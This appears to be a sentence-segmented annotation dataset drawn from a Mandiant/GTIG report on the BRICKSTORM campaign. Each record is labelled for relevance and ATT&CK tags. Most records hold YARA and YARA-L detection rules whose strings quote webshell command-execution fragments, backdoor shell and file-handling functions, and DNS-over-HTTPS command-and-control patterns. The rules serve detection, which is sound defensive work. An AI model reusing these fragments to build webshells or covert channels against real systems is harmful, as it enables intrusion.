"22_mandiant_report", "page_number": 1, "sentence_id": 150, "context_before": "We would like to specifically thank Nick Simonian from GTIG Research and Discovery (RAD).", "sentence_text": "We would also like to thank Ryan Tomcik from Mandiant Threat Defense (MTD) for contributing network detection content Indicators of Compromise The following indicators of compromise are available in a Google Threat Intelligence (GTI) collection .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s151-f7f7a8", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 151, "context_before": "We would also like to thank Ryan Tomcik from Mandiant Threat Defense (MTD) for contributing network detection content Indicators of Compromise The following indicators of compromise are available in a Google Threat Intelligence (GTI) collection .", "sentence_text": "Note that Mandiant has not observed instances where the threat actor reused a malware sample and hunting for the exact indicators is unlikely to yield results.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s152-73498d", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 152, "context_before": "Note that Mandiant has not observed instances where the threat actor reused a malware sample and hunting for the exact indicators is unlikely to yield results.", "sentence_text": "YARA Detections\nG_APT_Backdoor_BRICKSTORM_3\nrule G_APT_Backdoor_BRICKSTORM_3 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = { 48 8B 05 ?? ?? ?? ??", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s155-12cdbe", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 155, "context_before": "EB ??", "sentence_text": "} $str2 = \"regex\" ascii wide nocase $str3 = \"mime\" ascii wide nocase $str4 = \"decompress\" ascii wide nocase $str5 = \"MIMEHeader\" ascii wide nocase $str6 = \"ResolveReference\" ascii wide nocase $str7 = \"115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951\" ascii wide nocase condition:\nuint16(0) == 0x457F and all of them } G_Backdoor_BRICKSTORM_2 rule G_Backdoor_BRICKSTORM_2 {", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s156-54b586", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 156, "context_before": "} $str2 = \"regex\" ascii wide nocase $str3 = \"mime\" ascii wide nocase $str4 = \"decompress\" ascii wide nocase $str5 = \"MIMEHeader\" ascii wide nocase $str6 = \"ResolveReference\" ascii wide nocase $str7 = \"115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951\" ascii wide nocase condition:\nuint16(0) == 0x457F and all of them } G_Backdoor_BRICKSTORM_2 rule G_Backdoor_BRICKSTORM_2 {", "sentence_text": "meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$obf_func = /[a-z]{20}\\/[a-z]{20}\\/[a-z]{20}\\/[a-z]{20}.go/ $decr1 = { 0F B6 4C 04 ??", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s161-4cbf86", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 161, "context_before": "0F B6 5C 0C ??", "sentence_text": "7C E8 } $str1 = \"main.selfWatcher\" $str2 = \"main.copyFile\" $str3 = \"main.startNew\" $str4 = \"WRITE_LOG=true\" $str5 = \"WRITE_LOGWednesday\" $str6 = \"vami-httpdvideo/webm\" $str7 = \"/opt/vmware/sbin/\" $str8 = \"/home/vsphere-ui/\" $str9 = \"/opt/vmware/sbin/vami-http\" $str10 = \"main.getVFromEnv\" condition:\nuint32(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s162-5b9683", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 162, "context_before": "7C E8 } $str1 = \"main.selfWatcher\" $str2 = \"main.copyFile\" $str3 = \"main.startNew\" $str4 = \"WRITE_LOG=true\" $str5 = \"WRITE_LOGWednesday\" $str6 = \"vami-httpdvideo/webm\" $str7 = \"/opt/vmware/sbin/\" $str8 = \"/home/vsphere-ui/\" $str9 = \"/opt/vmware/sbin/vami-http\" $str10 = \"main.getVFromEnv\" condition:\nuint32(0)", "sentence_text": "== 0x464c457f and ((any of ($decr*) and $obf_func) or (any of ($decr*) and any of ($str*)) or 5 of ($str*)) and filesize < 10MB } G_APT_Backdoor_BRICKSTORM_1 rule G_APT_Backdoor_BRICKSTORM_1 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$ = \"WRITE_LOGWednesday\" $ = \"/home/vsphere-ui/\" $ = \"WRITE_LOG=true\" $ = \"dns rcode: %v\" $ = \"dns query not specified or too small\" $ = \"/dev/pts: bad file descriptor\" $ = \"/libs/doh.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s163-a0f70f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 163, "context_before": "== 0x464c457f and ((any of ($decr*) and $obf_func) or (any of ($decr*) and any of ($str*)) or 5 of ($str*)) and filesize < 10MB } G_APT_Backdoor_BRICKSTORM_1 rule G_APT_Backdoor_BRICKSTORM_1 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$ = \"WRITE_LOGWednesday\" $ = \"/home/vsphere-ui/\" $ = \"WRITE_LOG=true\" $ = \"dns rcode: %v\" $ = \"dns query not specified or too small\" $ = \"/dev/pts: bad file descriptor\" $ = \"/libs/doh.", "sentence_text": "Query\" $ = \"/libs/doh.createDnsMessage\" $ = \"/libs/doh.unpackDnsMessage\" $ = \"/core/protocol/websocket.(*WebSocketNetConfig).Dial\" $ = \"/core/protocol/websocket.(*connection).Read\" $ = \"/core/protocol/websocket.(*connection).getReader\" $ = \"/core/protocol/websocket.(*connection).Write\" $ = \"/core/protocol/websocket.(*connection).Close\" $ = \"/core/protocol/websocket.(*connection).LocalAddr\" $ = \"/core/protocol/websocket.(*connection).RemoteAddr\" $ = \"/core/protocol/websocket.(*connection).SetDeadline\" $ = \"/core/protocol/websocket.(*connection).SetReadDeadline\" $ = \"/core/protocol/websocket.(*connection).SetWriteDeadline\" $ = \"/core/protocol.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s164-27411f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 164, "context_before": "Query\" $ = \"/libs/doh.createDnsMessage\" $ = \"/libs/doh.unpackDnsMessage\" $ = \"/core/protocol/websocket.(*WebSocketNetConfig).Dial\" $ = \"/core/protocol/websocket.(*connection).Read\" $ = \"/core/protocol/websocket.(*connection).getReader\" $ = \"/core/protocol/websocket.(*connection).Write\" $ = \"/core/protocol/websocket.(*connection).Close\" $ = \"/core/protocol/websocket.(*connection).LocalAddr\" $ = \"/core/protocol/websocket.(*connection).RemoteAddr\" $ = \"/core/protocol/websocket.(*connection).SetDeadline\" $ = \"/core/protocol/websocket.(*connection).SetReadDeadline\" $ = \"/core/protocol/websocket.(*connection).SetWriteDeadline\" $ = \"/core/protocol.", "sentence_text": "UnPackHeaderData\" $ = \"/core/protocol.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s165-5cd7ed", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 165, "context_before": "UnPackHeaderData\" $ = \"/core/protocol.", "sentence_text": "NewWebSocketClient\" $ = \"/libs/func1.(*Client).BackgroundRun\" $ = \"/libs/func1.CreateClient\" $ = \"/libs/func1.NewService\" $ = \"/libs/func1.(*Service).Get\" $ = \"/libs/func1.(*Service).DoTask\" $ = \"/libs/func1.(*Service).Put\" $ = \"/core/extends/command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s166-9a0d5e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 166, "context_before": "NewWebSocketClient\" $ = \"/libs/func1.(*Client).BackgroundRun\" $ = \"/libs/func1.CreateClient\" $ = \"/libs/func1.NewService\" $ = \"/libs/func1.(*Service).Get\" $ = \"/libs/func1.(*Service).DoTask\" $ = \"/libs/func1.(*Service).Put\" $ = \"/core/extends/command.", "sentence_text": "Command\" $ = \"/core/extends/command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s167-a815e2", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 167, "context_before": "Command\" $ = \"/core/extends/command.", "sentence_text": "CommandNoContext\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s168-7222f2", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 168, "context_before": "CommandNoContext\"", "sentence_text": "$ = \"/core/extends/command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s169-be8097", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 169, "context_before": "$ = \"/core/extends/command.", "sentence_text": "ExecuteCmd\" $ = \"/core/extends/command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s170-794da1", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 170, "context_before": "ExecuteCmd\" $ = \"/core/extends/command.", "sentence_text": "RunShell\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s171-8e2502", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 171, "context_before": "RunShell\"", "sentence_text": "$ = \"/core/extends/socks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s172-92c260", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 172, "context_before": "$ = \"/core/extends/socks.", "sentence_text": "UnPackHeaderData\" $ = \"/core/extends/socks.handleRelay\" $ = \"/libs/fs.(*RemoteDriver).realPath\" $ = \"/libs/fs.(*RemoteDriver).ChangeDir\" $ = \"/libs/fs.(*RemoteDriver).Stat\" $ = \"/libs/fs.(*SimplePerm).GetMode\" $ = \"/libs/fs.(*SimplePerm).GetOwner\" $ = \"/libs/fs.(*SimplePerm).GetGroup\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s173-9c6992", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 173, "context_before": "UnPackHeaderData\" $ = \"/core/extends/socks.handleRelay\" $ = \"/libs/fs.(*RemoteDriver).realPath\" $ = \"/libs/fs.(*RemoteDriver).ChangeDir\" $ = \"/libs/fs.(*RemoteDriver).Stat\" $ = \"/libs/fs.(*SimplePerm).GetMode\" $ = \"/libs/fs.(*SimplePerm).GetOwner\" $ = \"/libs/fs.(*SimplePerm).GetGroup\"", "sentence_text": "$ = \"/libs/fs.(*RemoteDriver).ListDir\" $ = \"/libs/fs.(*RemoteDriver).DeleteDir\" $ = \"/libs/fs.(*RemoteDriver).DeleteFile\" $ = \"/libs/fs.(*RemoteDriver).Rename\" $ = \"/libs/fs.(*RemoteDriver).MakeDir\" $ = \"/libs/fs.(*RemoteDriver).GetFile\" $ = \"/libs/fs.(*RemoteDriver).PutFile\" $ = \"/libs/fs.(*RemoteDriver).UpFile\" $ = \"/libs/fs.(*RemoteDriver).MD5\" $ = \"/libs/doh/doh.go\" $ = \"/core/protocol/websocket/config.go\" $ = \"/core/extends/command/command.go\" $ = \"/libs/fs/driver_unix.go\" $ = \"/libs/fs/perm_linux.go\" condition:\nuint32(0) == 0x464c457f and 8 of them } G_APT_Backdoor_BRICKSTORM_2 rule G_APT_Backdoor_BRICKSTORM_2 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = { 0F 57 C0 0F 11 84 ?? ?? ?? ?? ??", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s207-c1c74b", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 207, "context_before": "4? 8B ??", "sentence_text": "C3 } condition:\nuint32be(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s208-087397", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 208, "context_before": "C3 } condition:\nuint32be(0)", "sentence_text": "== 0x7F454C46 and any of them } G_APT_BackdoorWebshell_SLAYSTYLE_1 rule G_APT_BackdoorWebshell_SLAYSTYLE_1 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = /String \\w{1,10}=request\\.getParameter\\(\\\"\\w{1,15}\\\"\\);/ ascii wide nocase $str2 = \"=new String(java.util.Base64.getDecoder().decode(\" ascii wide nocase $str21 = /String\\[\\]\\s\\w{1,10}=\\{\\\"\\/bin\\/sh\\\",\\\"-c\\\",\\w{1,10}\\+\\\"\\s2>&1\\\"\\};/ ascii wide nocase $str3 = \"= Runtime.getRuntime().exec(\" ascii wide nocase $str4 = \"java.io.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s209-a6a824", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 209, "context_before": "== 0x7F454C46 and any of them } G_APT_BackdoorWebshell_SLAYSTYLE_1 rule G_APT_BackdoorWebshell_SLAYSTYLE_1 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = /String \\w{1,10}=request\\.getParameter\\(\\\"\\w{1,15}\\\"\\);/ ascii wide nocase $str2 = \"=new String(java.util.Base64.getDecoder().decode(\" ascii wide nocase $str21 = /String\\[\\]\\s\\w{1,10}=\\{\\\"\\/bin\\/sh\\\",\\\"-c\\\",\\w{1,10}\\+\\\"\\s2>&1\\\"\\};/ ascii wide nocase $str3 = \"= Runtime.getRuntime().exec(\" ascii wide nocase $str4 = \"java.io.", "sentence_text": "InputStream\" ascii wide nocase $str5 = \"java.util.Base64.getEncoder().encodeToString(org.apache.commons.io.IOUtils.toByteArray(\" ascii wide nocase condition:\nfilesize < 5MB and all of them } G_APT_BackdoorWebshell_SLAYSTYLE_2 rule G_APT_BackdoorWebshell_SLAYSTYLE_2 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = \"request.getParameter\" nocase $str2 = \"/bin/sh\" $str3 = \"java.io.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s210-16b782", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 210, "context_before": "InputStream\" ascii wide nocase $str5 = \"java.util.Base64.getEncoder().encodeToString(org.apache.commons.io.IOUtils.toByteArray(\" ascii wide nocase condition:\nfilesize < 5MB and all of them } G_APT_BackdoorWebshell_SLAYSTYLE_2 rule G_APT_BackdoorWebshell_SLAYSTYLE_2 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = \"request.getParameter\" nocase $str2 = \"/bin/sh\" $str3 = \"java.io.", "sentence_text": "InputStream\" nocase $str4 = \"Runtime.getRuntime().exec(\" nocase $str5 = \"2>&1\" condition:\n(uint16(0) !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s211-6ff7c4", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 211, "context_before": "InputStream\" nocase $str4 = \"Runtime.getRuntime().exec(\" nocase $str5 = \"2>&1\" condition:\n(uint16(0) !", "sentence_text": "= 0x5A4D and uint32(0) !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s212-fafeec", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 212, "context_before": "= 0x5A4D and uint32(0) !", "sentence_text": "= 0x464C457F) and filesize < 7KB and all of them and @str4 > @str2 } G_Backdoor_BRICKSTEAL_1 rule G_Backdoor_BRICKSTEAL_1 { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s213-d019f0", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 213, "context_before": "= 0x464C457F) and filesize < 7KB and all of them and @str4 > @str2 } G_Backdoor_BRICKSTEAL_1 rule G_Backdoor_BRICKSTEAL_1 { meta:", "sentence_text": "author = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = \"comvmware\" $str2 = \"abcdABCD1234!@#$\" $str3 = \"ads.png\" $str4 = \"User-Agent\" $str5 = \"com/vmware/\" condition:\nall of them and filesize < 10KB } G_Dropper_BRICKSTEAL_1 rule G_Dropper_BRICKSTEAL_1 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = \"Base64.getDecoder().decode\" $str2 = \"Thread.currentThread().getContextClassLoader()\" $str3 = \".class.getDeclaredMethod\" $str4 = \"byte[].class\" $str5 = \"method.invoke\" $str6 = \"filterClass.newInstance()\" $str7 = \"/websso/SAML2/SSO/*\" condition:\nall of them } G_Dropper_BRICKSTEAL_2 rule G_Dropper_BRICKSTEAL_2 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = /\\(Class<\\?>\\)\\smethod\\.invoke\\(\\w{1,20},\\s\\w{1,20},\\s0,\\s\\w{1,20}\\.length\\);/i ascii wide $str2 = \"(\\\"yv66vg\" ascii wide $str3 = \"request.getSession().getServletContext\" ascii wide $str4 = \".getClass().getDeclaredField(\" ascii wide $str5 = \"new FilterDef();\" ascii wide $str6 = \"new FilterMap();\" ascii wide condition:\nall of them } Network Detections Google SecOps customers have access to these broad category rules and more under the Mandiant Front-Line Threats rule pack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s214-bd7500", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 214, "context_before": "author = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = \"comvmware\" $str2 = \"abcdABCD1234!@#$\" $str3 = \"ads.png\" $str4 = \"User-Agent\" $str5 = \"com/vmware/\" condition:\nall of them and filesize < 10KB } G_Dropper_BRICKSTEAL_1 rule G_Dropper_BRICKSTEAL_1 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = \"Base64.getDecoder().decode\" $str2 = \"Thread.currentThread().getContextClassLoader()\" $str3 = \".class.getDeclaredMethod\" $str4 = \"byte[].class\" $str5 = \"method.invoke\" $str6 = \"filterClass.newInstance()\" $str7 = \"/websso/SAML2/SSO/*\" condition:\nall of them } G_Dropper_BRICKSTEAL_2 rule G_Dropper_BRICKSTEAL_2 { meta:\nauthor = \"Google Threat Intelligence Group (GTIG)\" strings:\n$str1 = /\\(Class<\\?>\\)\\smethod\\.invoke\\(\\w{1,20},\\s\\w{1,20},\\s0,\\s\\w{1,20}\\.length\\);/i ascii wide $str2 = \"(\\\"yv66vg\" ascii wide $str3 = \"request.getSession().getServletContext\" ascii wide $str4 = \".getClass().getDeclaredField(\" ascii wide $str5 = \"new FilterDef();\" ascii wide $str6 = \"new FilterMap();\" ascii wide condition:\nall of them } Network Detections Google SecOps customers have access to these broad category rules and more under the Mandiant Front-Line Threats rule pack.", "sentence_text": "The following are YARA-L 2.0 rules for use in Google Security Operations; however, their logic can be replicated into other formats for use in other security products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s215-e4c067", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 215, "context_before": "The following are YARA-L 2.0 rules for use in Google Security Operations; however, their logic can be replicated into other formats for use in other security products.", "sentence_text": "Multiple DNS-over-HTTPS Services Queried rule hunting_t1071_001_multiple_dns_over_https_services_queried { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s216-9908d2", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 216, "context_before": "Multiple DNS-over-HTTPS Services Queried rule hunting_t1071_001_multiple_dns_over_https_services_queried { meta:", "sentence_text": "rule_name = \"Multiple DNS-over-HTTPS Services Queried\" severity = \"Low\" tactic = \"TA0011\" // Command and Control technique = \"T1071.001\" // Application Layer Protocol: Web Protocols reference = \"https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign\" description = \"Detects on requests by a source IP address to DNS-over-HTTPS (DoH) resolver IP addresses associated with multiple services, such as Quad9, Google DNS, and CloudFlare DNS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s217-db9457", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 217, "context_before": "rule_name = \"Multiple DNS-over-HTTPS Services Queried\" severity = \"Low\" tactic = \"TA0011\" // Command and Control technique = \"T1071.001\" // Application Layer Protocol: Web Protocols reference = \"https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign\" description = \"Detects on requests by a source IP address to DNS-over-HTTPS (DoH) resolver IP addresses associated with multiple services, such as Quad9, Google DNS, and CloudFlare DNS.", "sentence_text": "DoH is a protocol that encrypts DNS queries and responses using the HTTPS protocol.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s218-a7bf68", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 218, "context_before": "DoH is a protocol that encrypts DNS queries and responses using the HTTPS protocol.", "sentence_text": "Threat actors may use DoH to obfuscate domain names associated with their externally hosted infrastructure that would otherwise be visible in standard DNS queries.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s219-937c9a", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 219, "context_before": "Threat actors may use DoH to obfuscate domain names associated with their externally hosted infrastructure that would otherwise be visible in standard DNS queries.\"", "sentence_text": "events:\n$e.metadata.event_type = \"NETWORK_CONNECTION\" $e.target.ip = /^(8\\.8\\.8\\.8|8\\.8\\.4\\.4|9\\.9\\.9\\.9|9\\.9\\.9\\.11|1\\.1\\.1\\.1|1\\.0\\.0\\.1|45\\.90\\.28\\.160|45\\.90\\.30\\.160|149\\.112\\.112\\.112|149\\.112\\.112\\.11)$/ nocase ( $e.target.port = 443 or $e.target.url = /dns-query|:443\\/$|\\d\\.\\d\\.\\d\\.\\d\\/$/ nocase )\n$source_entity = strings.coalesce($e.principal.asset_id,$e.principal.ip)\nmatch:\n$source_entity over 2h outcome:\n$risk_score = max(35)\n$unique_doh_ips_count = count_distinct($e.target.ip)\ncondition:\n$e and $unique_doh_ips_count >= 5 options:\nallow_zero_values = true } Unknown Endpoint Generating DNS-over-HTTPS and Web Application Development Services Communication rule hunting_t1071_001_unknown_endpoint_generating_doh_and_web_development_services_communication { meta:\nrule_name = \"Unknown Endpoint Generating DNS-over-HTTPS and Web Application Development Services Communication\" severity = \"Medium\" tactic = \"TA0011\" // Command and Control technique = \"T1071.001\" // Application Layer Protocol: Web Protocols reference = \"https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign\" description = \"Detects on requests by an unknown source IP address to multiple DNS-over-HTTPS (DoH) resolver services and web application development services, such as Cloudflare Workers or Heroku hosted web applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s220-f55300", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 220, "context_before": "events:\n$e.metadata.event_type = \"NETWORK_CONNECTION\" $e.target.ip = /^(8\\.8\\.8\\.8|8\\.8\\.4\\.4|9\\.9\\.9\\.9|9\\.9\\.9\\.11|1\\.1\\.1\\.1|1\\.0\\.0\\.1|45\\.90\\.28\\.160|45\\.90\\.30\\.160|149\\.112\\.112\\.112|149\\.112\\.112\\.11)$/ nocase ( $e.target.port = 443 or $e.target.url = /dns-query|:443\\/$|\\d\\.\\d\\.\\d\\.\\d\\/$/ nocase )\n$source_entity = strings.coalesce($e.principal.asset_id,$e.principal.ip)\nmatch:\n$source_entity over 2h outcome:\n$risk_score = max(35)\n$unique_doh_ips_count = count_distinct($e.target.ip)\ncondition:\n$e and $unique_doh_ips_count >= 5 options:\nallow_zero_values = true } Unknown Endpoint Generating DNS-over-HTTPS and Web Application Development Services Communication rule hunting_t1071_001_unknown_endpoint_generating_doh_and_web_development_services_communication { meta:\nrule_name = \"Unknown Endpoint Generating DNS-over-HTTPS and Web Application Development Services Communication\" severity = \"Medium\" tactic = \"TA0011\" // Command and Control technique = \"T1071.001\" // Application Layer Protocol: Web Protocols reference = \"https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign\" description = \"Detects on requests by an unknown source IP address to multiple DNS-over-HTTPS (DoH) resolver services and web application development services, such as Cloudflare Workers or Heroku hosted web applications.", "sentence_text": "To investigate this activity further, determine the source of the network activity and verify if the communication is consistent with the device's intended use and standard allow-list domains.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s221-06f638", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 221, "context_before": "To investigate this activity further, determine the source of the network activity and verify if the communication is consistent with the device's intended use and standard allow-list domains.\"", "sentence_text": "events:\n$c1.metadata.event_type = \"NETWORK_CONNECTION\" $c1.target.ip = /^(8\\.8\\.8\\.8|8\\.8\\.4\\.4|9\\.9\\.9\\.9|9\\.9\\.9\\.11|1\\.1\\.1\\.1|1\\.0\\.0\\.1|45\\.90\\.28\\.160|45\\.90\\.30\\.160|149\\.112\\.112\\.112|149\\.112\\.112\\.11)$/ nocase $c1.principal.hostname = \"\" $c1.principal.asset_id = \"\" ( $c1.target.port = 443 or $c1.target.url = /dns-query|:443\\/$|\\d\\.\\d\\.\\d\\.\\d\\/$/ nocase )\n$c2.metadata.event_type = \"NETWORK_CONNECTION\" $c2.target.hostname = /\\.workers\\.dev$|\\.herokuapp\\.com$/ nocase $c2.principal.hostname = \"\" $c2.principal.asset_id = \"\" $c2.target.port = 443 $source_entity = $c1.principal.ip $source_entity = $c2.principal.ip match:\n$source_entity over 24h outcome:\n$risk_score = max(65)\n$unique_doh_ips_count = count_distinct($c1.target.ip)\ncondition:\n$c1 and $c2 and $unique_doh_ips_count >= 3 options:\nallow_zero_values = true } Unknown Endpoint Generating Google DNS-over-HTTPS and Cloudflare Hosted IP Communication rule hunting_t1071_001_unknown_endpoint_generating_google_doh_and_cloudflare_communication { meta:\nrule_name = \"Unknown Endpoint Generating Google DNS-over-HTTPS and Cloudflare Hosted IP Communication\" severity = \"Medium\" tactic = \"TA0011\" // Command and Control technique = \"T1071.001\" // Application Layer Protocol: Web Protocols reference = \"https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign\" description = \"Detects on requests by an unknown source IP address to Google DNS-over-HTTPS (DoH) resolver service and a Cloudflare hosted IP address.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s222-2f476f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 222, "context_before": "events:\n$c1.metadata.event_type = \"NETWORK_CONNECTION\" $c1.target.ip = /^(8\\.8\\.8\\.8|8\\.8\\.4\\.4|9\\.9\\.9\\.9|9\\.9\\.9\\.11|1\\.1\\.1\\.1|1\\.0\\.0\\.1|45\\.90\\.28\\.160|45\\.90\\.30\\.160|149\\.112\\.112\\.112|149\\.112\\.112\\.11)$/ nocase $c1.principal.hostname = \"\" $c1.principal.asset_id = \"\" ( $c1.target.port = 443 or $c1.target.url = /dns-query|:443\\/$|\\d\\.\\d\\.\\d\\.\\d\\/$/ nocase )\n$c2.metadata.event_type = \"NETWORK_CONNECTION\" $c2.target.hostname = /\\.workers\\.dev$|\\.herokuapp\\.com$/ nocase $c2.principal.hostname = \"\" $c2.principal.asset_id = \"\" $c2.target.port = 443 $source_entity = $c1.principal.ip $source_entity = $c2.principal.ip match:\n$source_entity over 24h outcome:\n$risk_score = max(65)\n$unique_doh_ips_count = count_distinct($c1.target.ip)\ncondition:\n$c1 and $c2 and $unique_doh_ips_count >= 3 options:\nallow_zero_values = true } Unknown Endpoint Generating Google DNS-over-HTTPS and Cloudflare Hosted IP Communication rule hunting_t1071_001_unknown_endpoint_generating_google_doh_and_cloudflare_communication { meta:\nrule_name = \"Unknown Endpoint Generating Google DNS-over-HTTPS and Cloudflare Hosted IP Communication\" severity = \"Medium\" tactic = \"TA0011\" // Command and Control technique = \"T1071.001\" // Application Layer Protocol: Web Protocols reference = \"https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign\" description = \"Detects on requests by an unknown source IP address to Google DNS-over-HTTPS (DoH) resolver service and a Cloudflare hosted IP address.", "sentence_text": "To investigate this activity 